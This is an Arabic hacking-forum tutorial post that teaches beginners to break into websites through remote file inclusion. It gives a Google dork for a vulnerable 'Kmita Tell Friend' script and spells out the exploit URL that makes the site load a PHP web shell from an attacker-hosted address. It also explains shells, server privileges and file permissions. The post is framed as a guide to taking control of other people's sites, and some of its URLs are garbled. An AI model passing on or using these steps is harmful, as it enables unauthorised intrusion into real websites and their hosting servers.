:: vBspiders Professional Network :: - خطوات الاختراق الصحيحه بعد اليوم راح تخترق علي كيفك

بسم الله الرحمن الرحيم

بعيدا عن المقدمات والكلام الكتير

كتير من المبتدأين يملوا بل ويفقدوا الامل في تعلم الهكر

يحثوا انو صعب

وذلك لعدم توفر الطريقه الصحيحيه لارشادهم الي الطريق المفيد

نترك اللغه لأهلها ونتكلم مع بعض كأنكـ قاعد أدامي

دلوقتي احنا عايزين نخترق موقع

كويس

نطير علي اي موقع يختص بالثغرات

وليكن الميل ورمـ

www.milw0rm.com

ونشوف لنا ثغرة ريموت فايل انكلود عشان سهله وتطبيقها سهل ومفيد

طيب واحد يسألني يعني ايه ريموت فايل انكلود

remote يعني تحكم

file يعني ملف

include يعني تشمل
اختصاراها r f i
يعني ملف للتحكمـ

ادراج ملف للتحكم

طيب للتحكم في ايه

اقولك في الموقع اللي عايزين نخترقوا

طيب كويس

نجيب ثغرة نطبق عليها الكلامـ

Dork:
"Powered by Kmita Tell Friend" "allinurl:/kmitat/"

ايه يا عم الكلام الكتير دا

موش فاهمين حاجه

واحده واحده كدا وقلنا

طيب انا معاكوا نفهمها واحده واحدها

دي ثغرة من نوع ريموت فايل انكلود
موجوده في سكريبت اسموا

" "allinurl:/kmitat/"
طيب الثغرة دي هنستغلها ازاي

اقولكـ نربطـ الثغرة بشيل عشان يقرالنا نلفات الموقع

طيب ايه هو الشيل

الشيل هو ملف مبرمج بلغة البي اتش بي

مرفوع علي استضافه مجانيه بلغة txt or jpg

طيب كويس وايه فايدة الشيل

بيقرالنا ملفات الموقع ومن خلالوا نقدر نتحكم بالموقع حسب صلاحيتنا

طيب ايه هيا الصلاحيات

الصلاحيات هي حالة المخترق بعد رفع الشيل
يعني الشيل هو اللي بيتحكم في نوع الصلاحيه

اما نوي بدي او يوزر او اباتشي او روت

واحد يقولي يعني بتختلف في نوع الشيل او طريقة رفعوا او اوا

اقولوا لا خالص
الاختلاف في صلاحيتك خسب حماية السيرفر

يعني لو السيرفر حمايتوا ه تلاقي صعوبه في الحصول علي اعلي الصلاحيات

طيب مين اللي بيتحكم بالصلاحيات

الروت او الادمنroot

طيب ايه فايدة معرفة الصلاحيه

عشان تعرف انت هتعمل ايه بالظبط

لان من صلاحيه لصلاحيه تفرق كتير
ممكن يكون ملف عله تصريح
777
رمزة علي الملفات : rwxrwxrwx

رمزة علي المجلدات : drwxrwxrwx

طيب أزاي نعرف ان التصريح دا 777
اقولك نحسبها سوي ونشوف هتيجي ولا لأ
اعلم أولا
r = 4
w = 2
x = 1
rwx rwx rwx "2"

طيب نبدل القيم الي فوق بما يساويها من ارقام

1+2+4=7
1+2+4=7
1+2+4=7
اذا
7 7 7

هو تصريحها

تقدر تعمل اللي انت عايزوا فيه

ممكن يكون مغلق التصريح

ما تقدر تفعل شئ
المهمـ نكمل

الثغرة اللي معانا

"Powered by Kmita Tell Friend" "allinurl:/kmitat/"

دوركـ البحث

اول ما تصمع كلمة دوركـ dork تعرف انواكود بحث
طيب نجي للاستغلال
يعني هنستغل البحث دا ازاي

ونعرف هل الموقع به الثغرة ولا لأ

اول ما تسمع كلمة اكسبلويت
أو

Example:
Expl:
Exploit:
Exploits:
Expl:

تعرف انها كود استغلال

http://www.xxx.com/kmitam/htmlcode.p...ttp://xxx.com/ txt?

'طيب نفسر اللي حصل ده

http://www.xxx.com عنوان الموقع
ممكن يكون مكتوب في الثغرة
[target]
[site]
[namesite]
[url]

kmitam الاسكريبت المصاب
ممكن تلقاه
/[scripts]/
/[path]/
/[dir]/
/[folder]/

= لادراج الشيل

http://xxx.com/txt?؟
ممكن تلقاه زي كدا
[SHELLURL]
[evil]
[shell]
[yourevil]
[evil_scripts]
[cmd]
[php shell]

شيل لو تلاحظون علامة ال بأخر الشيل
حتي يتم طلب الملف ولابد من وجودها

طيب معانا الثغرة كيف نشغلها ونجيب من الاخر اقولكـ

http://[url]/kmitam/htmlcode.php?file=http://[shll]/ txt?

وبكدا تقدر ترفع شيل وانت مطمن

بعض النقاط احب اقولها عشان تقدر تستوعب الشرح

لو عندكـ سكريبت مصاب اسموا
sir silveEer
ولاقيت الاستغلال زي كدا

http.www.xxx.com/silveEer/index.php=shll?

ومعاك موقع مصاب وليكن

www.mo0oka.com/

وعايز ترفع شيل

كويس من النقطه دي
هتاخد الاستغلال
وتضعوا بعد رابط الموقع

www.mo0oka.com/silveEer/index.php=shll؟
مع العلم ان السكريبت اللي بتبحث عنوا ومصاب بيكون تابع لعنوان الموقع مباشرة

مفاهيم تفيدكـ

السيرفر " هو بيت يحتوي علي عدة غرف والغرف هيا المواقع منافذها وبيبانها هي مدخل المخترق
أذا كانت قوية ومغلقه يصعب ان تدخل

واذا كانت مفتوحه وسهلة الكسر فهنيئا لمن دخلها

" الشيل " كما قلنا ملف متبرمج بلغة الاحتراف php

يسمح باعطاء الاوامر وقراءة الملفات

" الثغرة " هي خطأ احد المبرمجين في كتابته للغة البي اتش بي
وعن طريقها نقدر نستغل الخطأ في صالحنا

وفي الختام

اتمني اني اكون افدتكمـ

ولو لبعض الشئ

ولاي استفسار انا حاضر

اعلم شيئا

أثنان لا يتعلمان

المتكبر
و
الخجول

اذا اردت ان تكون هكر قويا فلا تكن منهم

ــبرب

أخوكمـ

sir silveEer